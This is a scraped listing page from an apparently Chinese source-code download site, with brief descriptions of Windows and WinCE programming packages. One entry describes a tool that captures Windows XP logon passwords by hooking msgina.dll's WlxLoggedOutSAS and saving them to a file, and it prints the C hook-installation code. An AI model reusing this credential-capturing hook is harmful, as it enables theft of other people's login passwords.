-
Windows Mobile手机中枚举拨号接入点
Windows Mobile手机中枚举拨号接入点-Windows Mobile phone dial-up access points enumerated
- 2022-06-28 07:59:11下载
- 积分:1
-
基于控制面板的注册程序 自己开发
基于控制面板的注册程序 自己开发-procedure for the registration of its own development
- 2022-06-17 07:20:50下载
- 积分:1
-
Wince5.0下使用VC++2005操作SQLCE3.0数据库,创建、打开数据库及数据表,代码经本人测试通过。...
Wince5.0下使用VC++2005操作SQLCE3.0数据库,创建、打开数据库及数据表,代码经本人测试通过。-Wince5.0 using VC++2005 operating SQLCE3.0 database, create, open the database and data tables, the code after I test.
- 2022-05-15 05:11:05下载
- 积分:1
-
Visual C++ 2005中CHAR,TCHAR,CString间转换函数
Visual C++ 2005中CHAR,TCHAR,CString间转换函数-Visual C++ 2005 in CHAR, TCHAR, CString intergovernmental transfer function
- 2022-02-07 16:00:22下载
- 积分:1
-
对于游戏仙境传说模拟器的最新版本(12.09.09)版本…
The latest version of the emulator for the game Ragnarok Online (12.09.09) Version Trunk, Not Stable -The latest version of the emulator for the game Ragnarok Online (12.09.09) Version Trunk, Not Stable ...
- 2022-07-27 15:55:51下载
- 积分:1
-
有序单链表,用C++描写的,是数据结构中的
有序单链表,用C++描写的,是数据结构中的-Single linked list in an orderly manner, using C++ description and is the data structure of
- 2022-03-18 17:14:19下载
- 积分:1
-
Word, Excel practice correcting system
WORD,EXCEL改卷练习系统-Word, Excel practice correcting system
- 2023-03-06 14:05:03下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
DNS解析系统(Windows版)
基于Windows的DNS解析系统
解析稳定,管理安全,SLA可达99.99%,无限制的解析条数,精准的IP网络划分,24小时在线技术支持, 服务器故障检
测及自动切换,永久免费,更有URL转发、负载均衡等更多功能...
- 2022-07-27 23:09:40下载
- 积分:1
-
同时利用DLL从记忆
also using dll from memory
- 2023-09-07 18:10:04下载
- 积分:1